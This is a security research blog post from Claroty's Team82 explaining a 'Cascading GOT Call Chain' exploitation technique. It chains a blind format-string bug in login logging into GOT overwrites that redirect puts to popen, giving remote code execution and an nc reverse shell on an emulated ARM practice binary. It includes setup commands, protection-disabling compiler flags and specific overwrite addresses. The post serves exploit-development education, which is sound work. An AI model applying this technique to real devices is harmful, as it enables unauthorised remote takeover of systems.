Team82 Logo Claroty
Return to Team82 Research

Cascading Chaos: A GOT-Oriented Exploit Story

/

Team82 researcher Tomer Goldschmidt explains in this research blog, his journey in developing a unique binary exploitation method that enabled him to achieve remote code execution on an interesting device. He was successful in achieving full chain remote code execution on the target system using this novel exploitation method.

Tomer was tasked with researching an end-of-life device that is no longer being updated by the vendor. Given this circumstance, he decided to publish this research without disclosing the affected platform, and is sharing the technique because it is beneficial to security researchers specializing in exploit development.

A security researcher's most lucrative reward—and ambition—is to pwn a system under assessment, even better without having prior knowledge about the specific system or without having privileges on the target. This makes our research process difficult, but also that much more satisfying and intriguing. Similarly to pragmatic and technical challenges in other fields, this one is composed of many steps that a researcher needs experience with in order to hone.

One of the first things I find myself thinking about in these kinds of projects is sources and sinks in the system, places where my input could trickle down and where it could subvert said systems. Doing this reveals and highlights potential attack surfaces exposed to a remote attacker with no prior leverage over the system.

With this specific project, I did a little thinking, focusing on what could be beneficial for me in my hunt for vulnerabilities, and the primitives to use in trying to pwn this system and prove exploitability.

During the early phase of my research, I tinkered with the idea that even without being registered on the system and without having any functionality exposed to me, I still have one thing that I can manipulate that might present an undiscovered vulnerability: logging of user interactions with the system.

Even without an active session or login credentials, an attacker can easily cause logs to be created and have fine-grained control over the content of these logs. Going ahead with this line of thinking, I experimented with the login interface of the web platform and tried to see the effects on the log facility. And so it happened that I found I can actually inject format string specifiers into my payloads sent to the system and have the system evaluate them in the log content that is out of my reach for reading.

Login input fields for our device.

This primitive exposes a format-string vulnerability that I could use to manipulate the application and eventually gain full control over the process. I will demonstrate how using only this primitive, I managed to achieve pre-authenticated remote code execution on this platform.

I figured that we need to have some kind of test subject to demonstrate our exploit development and novel technique. Therefore, I decided to implement a boiled down version of the application as the test platform on which to develop our exploit. This decision brings with it many advantages:

  • Having the source code enables us to focus on the exploit development

  • It also enables us fine-grained debugging capabilities and ease of testing

  • And also allows you to reproduce this experiment and sharpen your exploit development skills.

Phase 0: Understanding the Target

My target was a web service that enables remote configuration of the device with user session and authentication management. Additionally, the device was a Linux-based operating system, making our target binary a dynamically linked ELF executable.


In an effort to make this research beneficial, I am incorporating in it the development and exploitation process together. With that in mind we begin our journey by implementing the most basic application we can that follows guidelines of my actual target application.

Our initial target sample source code.

With this version of our application, we can easily cause a memory leak.

Demonstration of the memory leak capability within this version of our application

This slightly deviates from the original premise because with my target, I had no memory leak and had only a blind format string exploit capability. To stick to the storyline we are going to change the practice application.

This preserves our primitive, and eliminates visibility.

Now that we have a scenario that is more suitable to our constraints, we can discuss exploiting format string vulnerabilities to overwrite memory of running processes. To exploit this vulnerability we utilize a known technique used often when exploiting format string vulnerabilities. This technique relies on a specific format specifier %n.

Snippet from the MAN for printf (man 3 printf)

To utilize this technique, we need to have our controlled format string %n specifiers referencing a pointer passed as an argument that we control. This is possible by using the $ format specifier together with the n format specifier to specify the index of the target parameter to be overwritten.

An example of our necessary format specifiers.

Using these features together with a specially crafted payload, format string equips us with an essential exploitation primitive of write-what-where. This means that we are able to overwrite content at arbitrary locations in the process memory with values we control.

Phase 1: Emulating Target System

This technique will prove to be very impactful to researchers doing similar work. But before trying to exploit this version of our compiled application, we need to discuss the fact that our target device was an ARM-based CPU architecture machine and not a x86 64-bit base machine. You may have noticed that in our example for memory leakage, we show memory values in a 64-bit manner and not 32-bit-based memory value, which emphasizes the difference between our current version and the version of the target I worked with.

To be more accurate, we will go the extra mile and compile our target to fit an ARM 32-bit-based system. To do so, I decided it would be effective to demonstrate how I use Qemu to set up an ARM 32-bit based system with the lightweight Debian wheezy OS distribution.

Emulating this system was not daunting given our previous research on the Planet WGS-804HPT industrial switches, in which we provide explanation for how to emulate a MIPS guest operating system in a similar fashion:

#!/bin/sh
wget https://people.debian.org/~aurel32/qemu/armel/debian_wheezy_armel_standard.qcow2
wget https://people.debian.org/~aurel32/qemu/armel/initrd.img-3.2.0-4-versatile
wget https://people.debian.org/~aurel32/qemu/armel/vmlinuz-3.2.0-4-versatile

qemu-system-arm \
	-M versatilepb \
	-kernel vmlinuz-3.2.0-4-versatile \
	-initrd initrd.img-3.2.0-4-versatile \
	-hda debian_wheezy_armel_standard.qcow2 \
	-append "root=/dev/sda1 console=ttyAMA0" \
	-netdev user,id=net0,hostfwd=tcp::2222-:22,hostfwd=tcp::1111-:1111 \
	-device rtl8139,netdev=net0 \
	-nographic

Now we have the qemu-system-arm virtual machine set up:

We need to set up apt-get sources due to end-of-support for this distribution package manager.

root@debian-armel:~# echo "deb http://archive.debian.org/debian/ wheezy main non-free contrib
deb-src http://archive.debian.org/debian/ wheezy main non-free contrib
" > /etc/apt/sources.list
root@debian-armel:~# apt-get update
root@debian-armel:~# apt-get install debian-archive-keyring
root@debian-armel:~# apt-get update
root@debian-armel:~# apt-get install gcc

And voila, we have ourselves a cross compilation virtual machine at our disposal. Note that the ssh service on our guest is exposed on our host machine on port 2222. And so we use this port to transfer our main C code module to our compilation server.

HOST@Ubuntu:~$ scp -P 2222 ./main.c root@localhost:~/main.c
...

And to compile our target executable correctly and with alignment to our real target, we need to set some compiler arguments that disable some protections. Specifically these:

  •  -no-pie : Means our binary segments will load in the same memory regions every time.

  • -Wl,-z,norelro : Means our binary will have its symbols imported from other shared libraries on run-time. Making the GOT section, a table of pointers that is located in a corresponding section called the .got inside a compiled ELF binary, present in a RW memory protected segment instead of a Read-Only memory segment.

So the command used to compile the sample should look like this on our guest compilation ARM 32-bit machine

HOST@Ubuntu:~$ ssh -p 2222 root@localhost
root@debian-armel:~# gcc ./main.c -no-pie -Wl,-z,norelro
root@debian-armel:~# exit
...
HOST@Ubuntu:~$ scp -P 2222 ./main.c root@localhost:~/main.c

And it should result in an executable with the following characteristics:

Reviewing protection imposed in our sample executable using the checksec tool.

One more thing to do is to install socat and use a specific command to set up our practice range up and running. 

GUEST:~# apt-get install socat
...
GUEST:~# socat TCP-LISTEN:1111,fork,reuseaddr EXEC:./a.out

Running our practice remote application service on our guest Debian emulated machine

Testing our practice remote application service.

Phase 2: An Exploit Checklist

To showcase the novel technique used in this research, I need to set the stage a little bit more. A thing to note is that my target was a beefy executable with many intricate functionalities. This made my technique possible because it created the following necessary requirements:

  • A format string vuln primitive triggerable on demand repeatedly

  • Partial-RELRO/No-RELRO - enabling GOT entries overwriting

  • A function that returns a GLOBAL variable

For this we need to have a little more complicated practice sample. I developed a program that suits our pre-conditions to showcase this research novel exploitation technique.

The target program we are going to exploit.

A Write-What-Where Primitive

Having the target compiled, we may go ahead and start debugging; we run the sample with qemu-arm-static and provide the -g argument to attach a gdbserver to the process.

Running the program with gdbserver attached to the process.

When inspecting the content of the log file with observations of the stack contents on our connected remote pwndbg we can see that our format-string associates stack content further down.

Stack content associated by our payload format-string

Contents of the logs.txt file with our payload result


Now if we look further in the stack we can even see that our payload string is also located on the stack and enables us to have control over format-string references pointer variables.

Our own payload string buffer located on the stack and referenced in our log result.

Unhexed bytes from our log result.

This effectively means we have a write-what-where primitive, which is a critical component in our exploitation attempt.

Another Format-String Exploitation Trick

When developing our format-string payload we can reference specific parameter variables provided and dereferenced into the formatted string output. This can be achieved by another control format string control character specifier.

Printf MAN page snippet regarding the $ format specifier control character (man 3 printf)

This trick is effective in making our exploit payload shorter and more concise. Using this we can reference specific format variables without needing to iterate until them in our format specifier payload.

Overwriting GOT Entries

The global offset table (GOT) is a table of pointers that is located in a corresponding section called the .got inside a compiled ELF binary. This section allows for relocatable code loaded in varying range of memory locations to be accessible and resolved by the main program code. This means that the main code of the executable can use this section to resolve the location of imported symbols and relocations. The important thing to understand about the .get section when developing a memory corruption exploit is that it contains function pointers often resolved to shared object code. 

Resolved GOT entries from debugging session of the application process

For instance, in the image above we can see the standard library function puts that enables printing to standard output, and the address in which its implementation is located in memory.

So theoretically we can overwrite the address in the .got section holding the function pointer for some standard library function we know gets called later in the program and overwrite it with our own pointer to a different memory location.

Partial Address Overwrite With Format String Vulns

With the knowledge we have, we can continue on toward implementing a successful exploitation method. Our goal is to call a shared library function that allows us to execute shell commands, whether it be system/popen/exec.

Deciding how and what we overwrite with a GOT entry is not straightforward. This is because as we interact with the application process we don’t know where shell command execution functions are located in the memory, meaning we are effectively blind in that regard. 


Not all is lost, however. We still have functions from the standard shared library that have resolved entries in our GOT section. Meaning that we might have the opportunity to partiallyoverwrite one of those. And here comes in to play the feature of Length modifiers in format strings.

Format modifier allowing us a byte-by-byte overwrite capability

Having this feature makes it possible for us to do a partial overwrite of a single byte from the address stored in a GOT entry pointing to some function implemented in the shared library.


It is important to note that this is useful due to the fact that the shared library code gets loaded aligned according to their static code location relative to the base of the segment, meaning that we can calculate prior to our exploit implementation the offset between our target popen function and an already present function. 

Now say that we have a function that the offset between it and a function we want to call is small enough, meaning we might only need to partially overwrite the least significant byte of the address which is constant due to address alignment.

Imported functions relative offsets in standard shared library

In our case for instance we can overwrite the least significant byte of the puts resolved address from 0xc0 to 0x34 and we have the address just right.

Phase 4: The Technique: Cascading GOT Call Chain

With almost every aspect of the exploit implementation surveyed, we are left with the last hurdle ahead of us: chaining an effective code flow that calls a target libc function like popen and having control over the parameters to that target function. For instance in this scenario we need to have control over the R0 register and over R1.

The solution to overcome this issue that allowed me to finally implement an exploit chain was the concept of setting up the GOT entries for libc functions as domino pieces that eventually get tumbled in a chain reaction that lead to executing a shell command. The main point that brought this idea was that by only molding different values into the GOT entries we pretty much control what the code is doing. All we need to do is to adjust to code patterns in the program in such a way that makes sense.

And to really understand how this method works we need to go straight to the actual exploit.

Note: Here also comes into play our precondition for a function returning a global variable.

get_glob() inner method returning a global variable we can control using write-what-where

As a result:

  • We have a function that returns a variable we control.

  • We know its absolute location in the memory.

  • We can set any libc function to direct code flow into this target method.

  • We can also set any other libc function pointers in the GOT to any absolution/partial value.

We can determine which of the libc function pointers we control get used consecutively.

Phase 5: Putting It All Together

To stitch everything together, here is the flow of our exploit:

  • We iteratively write our shell command in memory

Write the shell command pair by pair of bytes (short)

As you can see we send our shell command string content little by little to overwrite some memory area that is writable that we pre-defined to be holding our shell command.

  • We partially overwrite the GOT entry for puts least significant byte to the least significant byte of the relative address of popen. remember that they are just adjacent enough so that they are sitting in the same alignment chunk. Making our overwrite perfect to translate a puts into popen.

  • This is the equivalent of placing the last domino piece in our column of dominos. The puts/popen won’t get called until we let them be called. (Starting from the end to the beginning).

Effectively replacing puts with popen.

  • Setting strdup to the program absolute address 0x8998.

The stdup function will then direct code flow to the point in code where a call to puts/popen is located.

Exploit chain, last two parts.

Setting fopen to the program absolute address 0x882c.

Exploit chain, last three parts

  • Setting GLOB_ERR_STR symbol to point at our shell command payload.

By doing so we make the get_glob method return our own shell command payload string pointer into register R0.

  • Setting fgets to the program absolute address 0x8808.

Doing this will set the naturally called fgets function, being called each iteration in the program loop, to direct code flow into our exploit code flow. Making this the first domino piece in our exploit chain together with placing the triggering effect to initiate the chain reaction.

The logic code flow of our exploit.

Having our full exploit chain implemented into a compact python script using pwnlib we are able to remotely execute a nc reverse shell command on the guest emulated system that connects to our listening client on our host.

Wrapping Up

We present a novel technique we previously used for achieving remote code execution on an  end-of-life device, which is no longer updated by the vendor. 

We developed a full-chain remote code execution on the target system by leveraging a pre-authenticated format-string vulnerability. This allowed us to gain a write-what-where primitive, which was then used to overwrite Global Offset Table (GOT) entries. 

We also demonstrated how to set up an emulated ARM 32-bit environment for exploit development and introduced the "Cascading GOT Call Chain" technique. 

This method involves chaining together GOT entry overwrites to control code flow and execute arbitrary shell commands. 

The research provides a practical guide for security researchers to develop similar exploits, even in the absence of memory leak primitives.

Stay in the know Get the Team82 Newsletter
Recent Vulnerability Disclosures
Claroty
LinkedIn Twitter YouTube Facebook